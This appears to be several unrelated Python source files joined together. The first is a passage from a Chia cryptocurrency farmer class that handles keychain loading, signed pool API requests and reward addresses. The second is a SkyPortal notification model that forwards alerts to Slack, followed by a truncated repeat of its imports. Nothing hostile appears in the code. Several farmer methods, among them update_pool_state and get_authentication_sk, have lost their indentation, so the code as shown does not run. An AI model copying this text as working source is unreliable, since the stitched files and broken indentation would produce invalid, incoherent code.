        self.quality_str_to_identifiers: Dict[bytes32, Tuple[str, bytes32, bytes32, bytes32]] = {}
        # number of responses to each signage point
        self.number_of_responses: Dict[bytes32, int] = {}
        # A dictionary of keys to time added. These keys refer to keys in the above 4 dictionaries. This is used
        # to periodically clear the memory
        self.cache_add_time: Dict[bytes32, uint64] = {}
        # One plot-sync Receiver per connected harvester peer id.
        self.plot_sync_receivers: Dict[bytes32, Receiver] = {}
        self.cache_clear_task: Optional[asyncio.Task] = None
        self.update_pool_state_task: Optional[asyncio.Task] = None
        self.constants = consensus_constants
        self._shut_down = False
        self.server: Any = None
        self.state_changed_callback: Optional[Callable] = None
        self.log = log
        self.started = False
        self.harvester_handshake_task: Optional[asyncio.Task] = None
        # From p2_singleton_puzzle_hash to pool state dict
        self.pool_state: Dict[bytes32, Dict] = {}
        # From p2_singleton to auth PrivateKey
        self.authentication_keys: Dict[bytes32, PrivateKey] = {}
        # Last time we updated pool_state based on the config file
        self.last_config_access_time: uint64 = uint64(0)
async def ensure_keychain_proxy(self) -> KeychainProxy:
if self.keychain_proxy is None:
if self.local_keychain:
self.keychain_proxy = wrap_local_keychain(self.local_keychain, log=self.log)
else:
self.keychain_proxy = await connect_to_keychain_and_validate(self._root_path, self.log)
if not self.keychain_proxy:
raise KeychainProxyConnectionFailure("Failed to connect to keychain service")
return self.keychain_proxy
    async def get_all_private_keys(self):
        """Fetch all root private keys from the keychain (via the proxy)."""
        keychain_proxy = await self.ensure_keychain_proxy()
        return await keychain_proxy.get_all_private_keys()
    async def setup_keys(self) -> bool:
        """Load root keys from the keychain and reward targets from config.

        Returns False (after logging) when no keys exist yet or a reward
        address is missing; `_start` keeps retrying until this succeeds.
        """
        no_keys_error_str = "No keys exist. Please run 'chia keys generate' or open the UI."
        self.all_root_sks: List[PrivateKey] = [sk for sk, _ in await self.get_all_private_keys()]
        # Derived farmer and pool child keys for every root key.
        self._private_keys = [master_sk_to_farmer_sk(sk) for sk in self.all_root_sks] + [
            master_sk_to_pool_sk(sk) for sk in self.all_root_sks
        ]

        if len(self.get_public_keys()) == 0:
            log.warning(no_keys_error_str)
            return False

        config = load_config(self._root_path, "config.yaml")
        # Fall back to the on-disk config sections when the injected ones do
        # not carry a reward address yet.
        if "xch_target_address" not in self.config:
            self.config = config["farmer"]
        if "xch_target_address" not in self.pool_config:
            self.pool_config = config["pool"]
        if "xch_target_address" not in self.config or "xch_target_address" not in self.pool_config:
            log.debug("xch_target_address missing in the config")
            return False

        # This is the farmer configuration
        self.farmer_target_encoded = self.config["xch_target_address"]
        self.farmer_target = decode_puzzle_hash(self.farmer_target_encoded)

        self.pool_public_keys = [G1Element.from_bytes(bytes.fromhex(pk)) for pk in self.config["pool_public_keys"]]

        # This is the self pooling configuration, which is only used for original self-pooled plots
        self.pool_target_encoded = self.pool_config["xch_target_address"]
        self.pool_target = decode_puzzle_hash(self.pool_target_encoded)
        # Map serialized G1 public key -> pool child secret key.
        self.pool_sks_map: Dict = {}
        for key in self.get_private_keys():
            self.pool_sks_map[bytes(key.get_g1())] = key

        # Decoded puzzle hashes are always 32 bytes.
        assert len(self.farmer_target) == 32
        assert len(self.pool_target) == 32
        if len(self.pool_sks_map) == 0:
            log.warning(no_keys_error_str)
            return False

        return True
    async def _start(self):
        """Kick off background initialization without blocking service startup."""

        async def start_task():
            # `Farmer.setup_keys` returns `False` if there are no keys setup yet. In this case we just try until it
            # succeeds or until we need to shut down.
            while not self._shut_down:
                if await self.setup_keys():
                    self.update_pool_state_task = asyncio.create_task(self._periodically_update_pool_state_task())
                    self.cache_clear_task = asyncio.create_task(self._periodically_clear_cache_and_refresh_task())
                    log.debug("start_task: initialized")
                    self.started = True
                    return
                await asyncio.sleep(1)

        # NOTE(review): the task handle is intentionally discarded; start_task
        # terminates on its own once keys are available or on shutdown.
        asyncio.create_task(start_task())
    def _close(self):
        # Signal all background loops to exit; `_await_closed` waits for them.
        self._shut_down = True

    async def _await_closed(self, shutting_down: bool = True):
        """Wait for background tasks after `_close`.

        When `shutting_down` is False the keychain proxy connection is
        intentionally left open.
        """
        if self.cache_clear_task is not None:
            await self.cache_clear_task
        if self.update_pool_state_task is not None:
            await self.update_pool_state_task
        if shutting_down and self.keychain_proxy is not None:
            proxy = self.keychain_proxy
            self.keychain_proxy = None
            await proxy.close()
            await asyncio.sleep(0.5)  # https://docs.aiohttp.org/en/stable/client_advanced.html#graceful-shutdown
        self.started = False

    def _set_state_changed_callback(self, callback: Callable):
        # Registered by the service framework; invoked through `state_changed`.
        self.state_changed_callback = callback
    async def on_connect(self, peer: WSChiaConnection):
        """Handle a new peer connection.

        For harvesters: register a plot-sync receiver and spawn a task that
        sends the harvester handshake once keys are available.
        """
        self.state_changed("add_connection", {})

        async def handshake_task():
            # Wait until the task in `Farmer._start` is done so that we have keys available for the handshake. Bail out
            # early if we need to shut down or if the harvester is not longer connected.
            while not self.started and not self._shut_down and peer in self.server.get_connections():
                await asyncio.sleep(1)

            if self._shut_down:
                log.debug("handshake_task: shutdown")
                self.harvester_handshake_task = None
                return

            if peer not in self.server.get_connections():
                log.debug("handshake_task: disconnected")
                self.harvester_handshake_task = None
                return

            # Sends a handshake to the harvester
            handshake = harvester_protocol.HarvesterHandshake(
                self.get_public_keys(),
                self.pool_public_keys,
            )
            msg = make_msg(ProtocolMessageTypes.harvester_handshake, handshake)
            await peer.send_message(msg)
            self.harvester_handshake_task = None

        if peer.connection_type is NodeType.HARVESTER:
            self.plot_sync_receivers[peer.peer_node_id] = Receiver(peer, self.plot_sync_callback)
            self.harvester_handshake_task = asyncio.create_task(handshake_task())
    def set_server(self, server):
        # Injected after construction by the service framework.
        self.server = server

    def state_changed(self, change: str, data: Dict[str, Any]):
        """Forward a state-change event to the registered callback, if any."""
        if self.state_changed_callback is not None:
            self.state_changed_callback(change, data)

    def handle_failed_pool_response(self, p2_singleton_puzzle_hash: bytes32, error_message: str):
        """Log a failed pool API call and record it in that pool's rolling
        24h error list."""
        self.log.error(error_message)
        self.pool_state[p2_singleton_puzzle_hash]["pool_errors_24h"].append(
            ErrorResponse(uint16(PoolErrorCode.REQUEST_FAILED.value), error_message).to_json_dict()
        )

    def on_disconnect(self, connection: ws.WSChiaConnection):
        """Drop per-peer state when a connection closes."""
        self.log.info(f"peer disconnected {connection.get_peer_logging()}")
        self.state_changed("close_connection", {})
        if connection.connection_type is NodeType.HARVESTER:
            # Remove the plot-sync receiver registered in `on_connect`.
            del self.plot_sync_receivers[connection.peer_node_id]

    async def plot_sync_callback(self, peer_id: bytes32, delta: Delta) -> None:
        """Called by a Receiver after a plot-sync update; notify the GUI only
        when the plot set actually changed."""
        log.info(f"plot_sync_callback: peer_id {peer_id}, delta {delta}")
        if not delta.empty():
            self.state_changed("new_plots", await self.get_harvesters())
    async def _pool_get_pool_info(self, pool_config: PoolWalletConfig) -> Optional[Dict]:
        """GET /pool_info from the pool.

        Returns the parsed JSON dict, or None on HTTP error / exception;
        both failure modes are recorded via `handle_failed_pool_response`.
        """
        try:
            async with aiohttp.ClientSession(trust_env=True) as session:
                async with session.get(
                    f"{pool_config.pool_url}/pool_info", ssl=ssl_context_for_root(get_mozilla_ca_crt(), log=self.log)
                ) as resp:
                    if resp.ok:
                        response: Dict = json.loads(await resp.text())
                        self.log.info(f"GET /pool_info response: {response}")
                        return response
                    else:
                        self.handle_failed_pool_response(
                            pool_config.p2_singleton_puzzle_hash,
                            f"Error in GET /pool_info {pool_config.pool_url}, {resp.status}",
                        )
        except Exception as e:
            self.handle_failed_pool_response(
                pool_config.p2_singleton_puzzle_hash, f"Exception in GET /pool_info {pool_config.pool_url}, {e}"
            )
        return None
    async def _pool_get_farmer(
        self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, authentication_sk: PrivateKey
    ) -> Optional[Dict]:
        """GET /farmer: query our membership state at the pool.

        The request is authenticated by signing the standard
        AuthenticationPayload with the pool authentication key. Returns the
        parsed JSON response (including error responses, which are also
        appended to the pool's 24h error list), or None on failure.
        """
        authentication_token = get_current_authentication_token(authentication_token_timeout)
        message: bytes32 = std_hash(
            AuthenticationPayload(
                "get_farmer", pool_config.launcher_id, pool_config.target_puzzle_hash, authentication_token
            )
        )
        signature: G2Element = AugSchemeMPL.sign(authentication_sk, message)
        get_farmer_params = {
            "launcher_id": pool_config.launcher_id.hex(),
            "authentication_token": authentication_token,
            "signature": bytes(signature).hex(),
        }
        try:
            async with aiohttp.ClientSession(trust_env=True) as session:
                async with session.get(
                    f"{pool_config.pool_url}/farmer",
                    params=get_farmer_params,
                    ssl=ssl_context_for_root(get_mozilla_ca_crt(), log=self.log),
                ) as resp:
                    if resp.ok:
                        response: Dict = json.loads(await resp.text())
                        log_level = logging.INFO
                        if "error_code" in response:
                            log_level = logging.WARNING
                            self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response)
                        self.log.log(log_level, f"GET /farmer response: {response}")
                        return response
                    else:
                        self.handle_failed_pool_response(
                            pool_config.p2_singleton_puzzle_hash,
                            f"Error in GET /farmer {pool_config.pool_url}, {resp.status}",
                        )
        except Exception as e:
            self.handle_failed_pool_response(
                pool_config.p2_singleton_puzzle_hash, f"Exception in GET /farmer {pool_config.pool_url}, {e}"
            )
        return None
    async def _pool_post_farmer(
        self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, owner_sk: PrivateKey
    ) -> Optional[Dict]:
        """POST /farmer: register this farmer with the pool.

        The payload carries our authentication public key and payout
        instructions and is signed with the owner key. Returns the parsed
        JSON response, or None on HTTP error / exception.
        """
        auth_sk: Optional[PrivateKey] = self.get_authentication_sk(pool_config)
        assert auth_sk is not None
        post_farmer_payload: PostFarmerPayload = PostFarmerPayload(
            pool_config.launcher_id,
            get_current_authentication_token(authentication_token_timeout),
            auth_sk.get_g1(),
            pool_config.payout_instructions,
            None,
        )
        assert owner_sk.get_g1() == pool_config.owner_public_key
        signature: G2Element = AugSchemeMPL.sign(owner_sk, post_farmer_payload.get_hash())
        post_farmer_request = PostFarmerRequest(post_farmer_payload, signature)

        self.log.debug(f"POST /farmer request {post_farmer_request}")

        try:
            # NOTE(review): unlike the GET calls, this session does not set
            # trust_env=True - confirm whether proxy support is intended here.
            async with aiohttp.ClientSession() as session:
                async with session.post(
                    f"{pool_config.pool_url}/farmer",
                    json=post_farmer_request.to_json_dict(),
                    ssl=ssl_context_for_root(get_mozilla_ca_crt(), log=self.log),
                ) as resp:
                    if resp.ok:
                        response: Dict = json.loads(await resp.text())
                        log_level = logging.INFO
                        if "error_code" in response:
                            log_level = logging.WARNING
                            self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response)
                        self.log.log(log_level, f"POST /farmer response: {response}")
                        return response
                    else:
                        self.handle_failed_pool_response(
                            pool_config.p2_singleton_puzzle_hash,
                            f"Error in POST /farmer {pool_config.pool_url}, {resp.status}",
                        )
        except Exception as e:
            self.handle_failed_pool_response(
                pool_config.p2_singleton_puzzle_hash, f"Exception in POST /farmer {pool_config.pool_url}, {e}"
            )
        return None
    async def _pool_put_farmer(
        self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, owner_sk: PrivateKey
    ) -> None:
        """PUT /farmer: update our registration at the pool (e.g. new payout
        instructions or authentication key), signed with the owner key.

        Fire-and-forget: the response is only logged / recorded, not returned.
        """
        auth_sk: Optional[PrivateKey] = self.get_authentication_sk(pool_config)
        assert auth_sk is not None
        put_farmer_payload: PutFarmerPayload = PutFarmerPayload(
            pool_config.launcher_id,
            get_current_authentication_token(authentication_token_timeout),
            auth_sk.get_g1(),
            pool_config.payout_instructions,
            None,
        )
        assert owner_sk.get_g1() == pool_config.owner_public_key
        signature: G2Element = AugSchemeMPL.sign(owner_sk, put_farmer_payload.get_hash())
        put_farmer_request = PutFarmerRequest(put_farmer_payload, signature)

        self.log.debug(f"PUT /farmer request {put_farmer_request}")

        try:
            # NOTE(review): no trust_env=True here, unlike the GET calls -
            # confirm whether proxy support is intended.
            async with aiohttp.ClientSession() as session:
                async with session.put(
                    f"{pool_config.pool_url}/farmer",
                    json=put_farmer_request.to_json_dict(),
                    ssl=ssl_context_for_root(get_mozilla_ca_crt(), log=self.log),
                ) as resp:
                    if resp.ok:
                        response: Dict = json.loads(await resp.text())
                        log_level = logging.INFO
                        if "error_code" in response:
                            log_level = logging.WARNING
                            self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response)
                        self.log.log(log_level, f"PUT /farmer response: {response}")
                    else:
                        self.handle_failed_pool_response(
                            pool_config.p2_singleton_puzzle_hash,
                            f"Error in PUT /farmer {pool_config.pool_url}, {resp.status}",
                        )
        except Exception as e:
            self.handle_failed_pool_response(
                pool_config.p2_singleton_puzzle_hash, f"Exception in PUT /farmer {pool_config.pool_url}, {e}"
            )
def get_authentication_sk(self, pool_config: PoolWalletConfig) -> Optional[PrivateKey]:
if pool_config.p2_singleton_puzzle_hash in self.authentication_keys:
return self.authentication_keys[pool_config.p2_singleton_puzzle_hash]
auth_sk: Optional[PrivateKey] = find_authentication_sk(self.all_root_sks, pool_config.owner_public_key)
if auth_sk is not None:
self.authentication_keys[pool_config.p2_singleton_puzzle_hash] = auth_sk
return auth_sk
async def update_pool_state(self):
config = load_config(self._root_path, "config.yaml")
pool_config_list: List[PoolWalletConfig] = load_pool_config(self._root_path)
for pool_config in pool_config_list:
p2_singleton_puzzle_hash = pool_config.p2_singleton_puzzle_hash
try:
authentication_sk: Optional[PrivateKey] = self.get_authentication_sk(pool_config)
if authentication_sk is None:
self.log.error(f"Could not find authentication sk for {p2_singleton_puzzle_hash}")
continue
add_auth_key(self._root_path, pool_config, authentication_sk.get_g1())
if p2_singleton_puzzle_hash not in self.pool_state:
self.pool_state[p2_singleton_puzzle_hash] = {
"points_found_since_start": 0,
"points_found_24h": [],
"points_acknowledged_since_start": 0,
"points_acknowledged_24h": [],
"next_farmer_update": 0,
"next_pool_info_update": 0,
"current_points": 0,
"current_difficulty": None,
"pool_errors_24h": [],
"authentication_token_timeout": None,
}
self.log.info(f"Added pool: {pool_config}")
pool_state = self.pool_state[p2_singleton_puzzle_hash]
pool_state["pool_config"] = pool_config
# Skip state update when self pooling
if pool_config.pool_url == "":
continue
enforce_https = config["full_node"]["selected_network"] == "mainnet"
if enforce_https and not pool_config.pool_url.startswith("https://"):
self.log.error(f"Pool URLs must be HTTPS on mainnet {pool_config.pool_url}")
continue
# TODO: Improve error handling below, inform about unexpected failures
if time.time() >= pool_state["next_pool_info_update"]:
pool_state["next_pool_info_update"] = time.time() + UPDATE_POOL_INFO_INTERVAL
# Makes a GET request to the pool to get the updated information
pool_info = await self._pool_get_pool_info(pool_config)
if pool_info is not None and "error_code" not in pool_info:
pool_state["authentication_token_timeout"] = pool_info["authentication_token_timeout"]
# Only update the first time from GET /pool_info, gets updated from GET /farmer later
if pool_state["current_difficulty"] is None:
pool_state["current_difficulty"] = pool_info["minimum_difficulty"]
if time.time() >= pool_state["next_farmer_update"]:
pool_state["next_farmer_update"] = time.time() + UPDATE_POOL_FARMER_INFO_INTERVAL
authentication_token_timeout = pool_state["authentication_token_timeout"]
async def update_pool_farmer_info() -> Tuple[Optional[GetFarmerResponse], Optional[PoolErrorCode]]:
# Run a GET /farmer to see if the farmer is already known by the pool
response = await self._pool_get_farmer(
pool_config, authentication_token_timeout, authentication_sk
)
farmer_response: Optional[GetFarmerResponse] = None
error_code_response: Optional[PoolErrorCode] = None
if response is not None:
if "error_code" not in response:
farmer_response = GetFarmerResponse.from_json_dict(response)
if farmer_response is not None:
pool_state["current_difficulty"] = farmer_response.current_difficulty
pool_state["current_points"] = farmer_response.current_points
else:
try:
error_code_response = PoolErrorCode(response["error_code"])
except ValueError:
self.log.error(
f"Invalid error code received from the pool: {response['error_code']}"
)
return farmer_response, error_code_response
if authentication_token_timeout is not None:
farmer_info, error_code = await update_pool_farmer_info()
if error_code == PoolErrorCode.FARMER_NOT_KNOWN:
# Make the farmer known on the pool with a POST /farmer
owner_sk_and_index: Optional[PrivateKey, uint32] = find_owner_sk(
self.all_root_sks, pool_config.owner_public_key
)
assert owner_sk_and_index is not None
post_response = await self._pool_post_farmer(
pool_config, authentication_token_timeout, owner_sk_and_index[0]
)
if post_response is not None and "error_code" not in post_response:
self.log.info(
f"Welcome message from {pool_config.pool_url}: "
f"{post_response['welcome_message']}"
)
# Now we should be able to update the local farmer info
farmer_info, farmer_is_known = await update_pool_farmer_info()
if farmer_info is None and not farmer_is_known:
self.log.error("Failed to update farmer info after POST /farmer.")
# Update the farmer information on the pool if the payout instructions changed or if the
# signature is invalid (latter to make sure the pool has the correct authentication public key).
payout_instructions_update_required: bool = (
farmer_info is not None
and pool_config.payout_instructions.lower() != farmer_info.payout_instructions.lower()
)
if payout_instructions_update_required or error_code == PoolErrorCode.INVALID_SIGNATURE:
owner_sk_and_index: Optional[PrivateKey, uint32] = find_owner_sk(
self.all_root_sks, pool_config.owner_public_key
)
assert owner_sk_and_index is not None
await self._pool_put_farmer(
pool_config, authentication_token_timeout, owner_sk_and_index[0]
)
else:
self.log.warning(
f"No pool specific authentication_token_timeout has been set for {p2_singleton_puzzle_hash}"
f", check communication with the pool."
)
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Exception in update_pool_state for {pool_config.pool_url}, {e} {tb}")
    def get_public_keys(self):
        """Return G1 public keys for all derived farmer/pool child keys."""
        return [child_sk.get_g1() for child_sk in self._private_keys]

    def get_private_keys(self):
        """Return the derived farmer and pool child secret keys."""
        return self._private_keys
    async def get_reward_targets(self, search_for_private_key: bool) -> Dict:
        """Return the configured reward addresses.

        When `search_for_private_key` is True, additionally scan the first
        500 wallet derivation indices of every root key and report whether
        we hold keys matching the farmer/pool targets.
        """
        if search_for_private_key:
            all_sks = await self.get_all_private_keys()
            stop_searching_for_farmer, stop_searching_for_pool = False, False
            for i in range(500):
                if stop_searching_for_farmer and stop_searching_for_pool and i > 0:
                    break
                for sk, _ in all_sks:
                    ph = create_puzzlehash_for_pk(master_sk_to_wallet_sk(sk, uint32(i)).get_g1())

                    if ph == self.farmer_target:
                        stop_searching_for_farmer = True
                    if ph == self.pool_target:
                        stop_searching_for_pool = True

            return {
                "farmer_target": self.farmer_target_encoded,
                "pool_target": self.pool_target_encoded,
                "have_farmer_sk": stop_searching_for_farmer,
                "have_pool_sk": stop_searching_for_pool,
            }
        return {
            "farmer_target": self.farmer_target_encoded,
            "pool_target": self.pool_target_encoded,
        }
    def set_reward_targets(self, farmer_target_encoded: Optional[str], pool_target_encoded: Optional[str]):
        """Update the farmer and/or pool reward addresses in memory and
        persist them to config.yaml (None leaves a target unchanged)."""
        with lock_and_load_config(self._root_path, "config.yaml") as config:
            if farmer_target_encoded is not None:
                self.farmer_target_encoded = farmer_target_encoded
                self.farmer_target = decode_puzzle_hash(farmer_target_encoded)
                config["farmer"]["xch_target_address"] = farmer_target_encoded
            if pool_target_encoded is not None:
                self.pool_target_encoded = pool_target_encoded
                self.pool_target = decode_puzzle_hash(pool_target_encoded)
                config["pool"]["xch_target_address"] = pool_target_encoded
            save_config(self._root_path, "config.yaml", config)
    async def set_payout_instructions(self, launcher_id: bytes32, payout_instructions: str):
        """Persist new payout instructions for the pool identified by
        `launcher_id` and force a prompt GET /farmer refresh."""
        for p2_singleton_puzzle_hash, pool_state_dict in self.pool_state.items():
            if launcher_id == pool_state_dict["pool_config"].launcher_id:
                with lock_and_load_config(self._root_path, "config.yaml") as config:
                    new_list = []
                    pool_list = config["pool"].get("pool_list", [])
                    if pool_list is not None:
                        for list_element in pool_list:
                            if hexstr_to_bytes(list_element["launcher_id"]) == bytes(launcher_id):
                                list_element["payout_instructions"] = payout_instructions
                            new_list.append(list_element)
                    config["pool"]["pool_list"] = new_list
                    save_config(self._root_path, "config.yaml", config)
                # Force a GET /farmer which triggers the PUT /farmer if it detects the changed instructions
                pool_state_dict["next_farmer_update"] = 0
                return

        self.log.warning(f"Launcher id: {launcher_id} not found")
    async def generate_login_link(self, launcher_id: bytes32) -> Optional[str]:
        """Build a signed pool /login URL for the given launcher id.

        Returns None when the launcher id matches no tracked pool or no
        authentication key can be derived for its pool config.
        """
        for pool_state in self.pool_state.values():
            pool_config: PoolWalletConfig = pool_state["pool_config"]
            if pool_config.launcher_id == launcher_id:
                authentication_sk: Optional[PrivateKey] = self.get_authentication_sk(pool_config)
                if authentication_sk is None:
                    self.log.error(f"Could not find authentication sk for {pool_config.p2_singleton_puzzle_hash}")
                    continue
                authentication_token_timeout = pool_state["authentication_token_timeout"]
                authentication_token = get_current_authentication_token(authentication_token_timeout)
                # Sign the standard authentication payload so the pool can
                # verify the login request.
                message: bytes32 = std_hash(
                    AuthenticationPayload(
                        "get_login", pool_config.launcher_id, pool_config.target_puzzle_hash, authentication_token
                    )
                )
                signature: G2Element = AugSchemeMPL.sign(authentication_sk, message)
                return (
                    pool_config.pool_url
                    + f"/login?launcher_id={launcher_id.hex()}&authentication_token={authentication_token}"
                    f"&signature={bytes(signature).hex()}"
                )

        return None
async def get_harvesters(self) -> Dict:
harvesters: List = []
for connection in self.server.get_connections(NodeType.HARVESTER):
self.log.debug(f"get_harvesters host: {connection.peer_host}, node_id: {connection.peer_node_id}")
receiver = self.plot_sync_receivers.get(connection.peer_node_id)
if receiver is not None:
harvesters.append(receiver.to_dict())
else:
self.log.debug(
f"get_harvesters invalid peer: {connection.peer_host}, node_id: {connection.peer_node_id}"
)
return {"harvesters": harvesters}
    async def _periodically_update_pool_state_task(self):
        """Background loop: refresh pool state whenever config.yaml changes
        on disk, and at least once every ~60 seconds otherwise."""
        time_slept: uint64 = uint64(0)
        config_path: Path = config_path_for_filename(self._root_path, "config.yaml")
        while not self._shut_down:
            # Every time the config file changes, read it to check the pool state
            stat_info = config_path.stat()
            if stat_info.st_mtime > self.last_config_access_time:
                # If we detect the config file changed, refresh private keys first just in case
                self.all_root_sks: List[PrivateKey] = [sk for sk, _ in await self.get_all_private_keys()]
                self.last_config_access_time = stat_info.st_mtime
                await self.update_pool_state()
                time_slept = uint64(0)
            elif time_slept > 60:
                # No config change detected for over a minute - refresh anyway.
                await self.update_pool_state()
                time_slept = uint64(0)
            time_slept += 1
            await asyncio.sleep(1)
    async def _periodically_clear_cache_and_refresh_task(self):
        """Background loop: evict stale signage-point caches and periodically
        poke the GUI so connection rates stay current."""
        time_slept: uint64 = uint64(0)
        refresh_slept = 0
        while not self._shut_down:
            try:
                if time_slept > self.constants.SUB_SLOT_TIME_TARGET:
                    now = time.time()
                    removed_keys: List[bytes32] = []
                    # Evict entries older than 3 sub-slot targets from all four
                    # per-signage-point dictionaries.
                    for key, add_time in self.cache_add_time.items():
                        if now - float(add_time) > self.constants.SUB_SLOT_TIME_TARGET * 3:
                            self.sps.pop(key, None)
                            self.proofs_of_space.pop(key, None)
                            self.quality_str_to_identifiers.pop(key, None)
                            self.number_of_responses.pop(key, None)
                            removed_keys.append(key)
                    # Second pass so the dict isn't mutated while iterating.
                    for key in removed_keys:
                        self.cache_add_time.pop(key, None)
                    time_slept = uint64(0)
                    log.debug(
                        f"Cleared farmer cache. Num sps: {len(self.sps)} {len(self.proofs_of_space)} "
                        f"{len(self.quality_str_to_identifiers)} {len(self.number_of_responses)}"
                    )
                time_slept += 1
                refresh_slept += 1
                # Periodically refresh GUI to show the correct download/upload rate.
                if refresh_slept >= 30:
                    self.state_changed("add_connection", {})
                    refresh_slept = 0
            except Exception:
                log.error(f"_periodically_clear_cache_and_refresh_task failed: {traceback.format_exc()}")
            await asyncio.sleep(1)
|
__all__ = ['UserNotification']
import json
import sqlalchemy as sa
from sqlalchemy.orm import relationship
from sqlalchemy import event
import requests
from baselayer.app.models import DBSession, Base, User, AccessibleIfUserMatches
from baselayer.app.env import load_env
from baselayer.app.flow import Flow
from ..app_utils import get_app_base_url
from .allocation import Allocation
from .classification import Classification
from .gcn import GcnNotice
from .localization import Localization
from .spectrum import Spectrum
from .comment import Comment
from .listing import Listing
from .facility_transaction import FacilityTransaction
_, cfg = load_env()
class UserNotification(Base):
    """In-app notification addressed to a single user."""

    # Row-level security: only the owning user may read/update/delete.
    read = update = delete = AccessibleIfUserMatches('user')

    user_id = sa.Column(
        sa.ForeignKey("users.id", ondelete="CASCADE"),
        nullable=False,
        index=True,
        doc="ID of the associated User",
    )
    user = relationship(
        "User",
        back_populates="notifications",
        doc="The associated User",
    )
    text = sa.Column(
        sa.String(),
        nullable=False,
        doc="The notification text to display",
    )
    viewed = sa.Column(
        sa.Boolean,
        nullable=False,
        default=False,
        index=True,
        doc="Boolean indicating whether notification has been viewed.",
    )
    url = sa.Column(
        sa.String(),
        nullable=True,
        doc="URL to which to direct upon click, if relevant",
    )
@event.listens_for(UserNotification, 'after_insert')
def send_slack_notification(mapper, connection, target):
    """Forward a newly inserted UserNotification to the user's Slack
    integration, honoring the user's per-category preferences.

    SQLAlchemy 'after_insert' hook; `target` is the new UserNotification.
    Silently returns when the integration is inactive, the URL fails the
    configured preamble check, or the matching category flag is off.
    """
    if not target.user:
        return

    if not target.user.preferences:
        return

    prefs = target.user.preferences.get('slack_integration')

    if not prefs:
        return

    if prefs.get("active", False):
        integration_url = prefs.get("url", "")
    else:
        return

    # Guard against notification URLs pointing somewhere other than Slack.
    if not integration_url.startswith(cfg.get("slack.expected_url_preamble", "https")):
        return

    # Fixed: the inner call previously reused the enclosing f-string's quote
    # character, which is a SyntaxError on Python < 3.12 (PEP 701 only allows
    # quote reuse from 3.12 onward).
    slack_microservice_url = f'http://127.0.0.1:{cfg.get("slack.microservice_port", 64100)}'

    # Categorize the notification from its text so the matching preference
    # flag can be consulted. NOTE(review): substring matching is fragile.
    is_mention = target.text.find("mentioned you") != -1
    is_gcnnotice = target.text.find("on GcnEvent") != -1
    is_facility_transaction = target.text.find("submission") != -1

    if is_mention:
        if not target.user.preferences['slack_integration'].get("mentions", False):
            return
    elif is_gcnnotice:
        if not target.user.preferences['slack_integration'].get("gcnnotices", False):
            return
    elif is_facility_transaction:
        if not target.user.preferences['slack_integration'].get(
            "facilitytransactions", False
        ):
            return
    elif not target.user.preferences['slack_integration'].get(
        "favorite_sources", False
    ):
        return

    app_url = get_app_base_url()
    data = json.dumps(
        {"url": integration_url, "text": f'{target.text} ({app_url}{target.url})'}
    )
    requests.post(
        slack_microservice_url, data=data, headers={'Content-Type': 'application/json'}
    )
@event.listens_for(Classification, 'after_insert')
@event.listens_for(Spectrum, 'after_insert')
@event.listens_for(Comment, 'after_insert')
@event.listens_for(GcnNotice, 'after_insert')
@event.listens_for(FacilityTransaction, 'after_insert')
def add_user_notifications(mapper, connection, target):
    """Queue front-end UserNotifications for users interested in a newly
    inserted record (classification, spectrum, comment, GCN notice, or
    facility transaction).

    The work is deferred to a one-shot 'after_flush' hook so the new
    notification rows can be added to the same session. Fixed here: two
    f-strings previously reused the enclosing quote character inside the
    replacement field, a SyntaxError on Python < 3.12 (PEP 701).
    """

    # Add front-end user notifications
    @event.listens_for(DBSession(), "after_flush", once=True)
    def receive_after_flush(session, context):
        # Infer the record category from its serialized fields.
        is_gcnnotice = "dateobs" in target.to_dict()
        is_facility_transaction = "initiator_id" in target.to_dict()
        if is_gcnnotice:
            users = User.query.filter(
                User.preferences["slack_integration"]["gcnnotices"]
                .astext.cast(sa.Boolean)
                .is_(True)
            ).all()
        elif is_facility_transaction:
            users = User.query.filter(
                User.preferences["slack_integration"]["facilitytransactions"]
                .astext.cast(sa.Boolean)
                .is_(True)
            ).all()
        else:
            # Otherwise notify users who favorited this object and opted in
            # to activity notifications for this record type.
            listing_subquery = (
                Listing.query.filter(Listing.list_name == "favorites")
                .filter(Listing.obj_id == target.obj_id)
                .distinct(Listing.user_id)
                .subquery()
            )
            users = (
                User.query.join(listing_subquery, User.id == listing_subquery.c.user_id)
                .filter(
                    User.preferences["favorite_sources_activity_notifications"][
                        target.__tablename__
                    ]
                    .astext.cast(sa.Boolean)
                    .is_(True)
                )
                .all()
            )

        ws_flow = Flow()
        for user in users:
            # Only notify users who have read access to the new record in question
            if target.__class__.get_if_accessible_by(target.id, user) is not None:
                if is_gcnnotice:
                    session.add(
                        UserNotification(
                            user=user,
                            text=f"New {target.__class__.__name__.lower()} on GcnEvent *{target.dateobs}*",
                            url=f"/gcn_events/{str(target.dateobs).replace(' ', 'T')}",
                        )
                    )
                elif is_facility_transaction:
                    if "observation_plan_request" in target.to_dict():
                        allocation_id = target.observation_plan_request.allocation_id
                        allocation = session.query(Allocation).get(allocation_id)
                        instrument = allocation.instrument
                        localization_id = (
                            target.observation_plan_request.localization_id
                        )
                        localization = session.query(Localization).get(localization_id)
                        session.add(
                            UserNotification(
                                user=user,
                                text=f"New observation plan submission for GcnEvent *{localization.dateobs}* by *{instrument.name}*",
                                url=f"/gcn_events/{str(localization.dateobs).replace(' ', 'T')}",
                            )
                        )
                    elif "followup_request" in target.to_dict():
                        allocation_id = target.followup_request.allocation_id
                        allocation = session.query(Allocation).get(allocation_id)
                        instrument = allocation.instrument
                        session.add(
                            UserNotification(
                                user=user,
                                text=f"New follow-up submission for object *{target.followup_request.obj_id}* by *{instrument.name}*",
                                url=f"/source/{target.followup_request.obj_id}",
                            )
                        )
                else:
                    session.add(
                        UserNotification(
                            user=user,
                            text=f"New {target.__class__.__name__.lower()} on your favorite source *{target.obj_id}*",
                            url=f"/source/{target.obj_id}",
                        )
                    )
                ws_flow.push(user.id, "skyportal/FETCH_NOTIFICATIONS")
| __all__ = ['UserNotification']
import json
import sqlalchemy as sa
from sqlalchemy.orm import relationship
from sqlalchemy import event
import requests
from baselayer.app.models import DBSession, Base, User, AccessibleIfUserMatches
from baselayer.app.env import load_env
from baselayer.app.flow import Flow
from ..app_utils import get_app_base_url
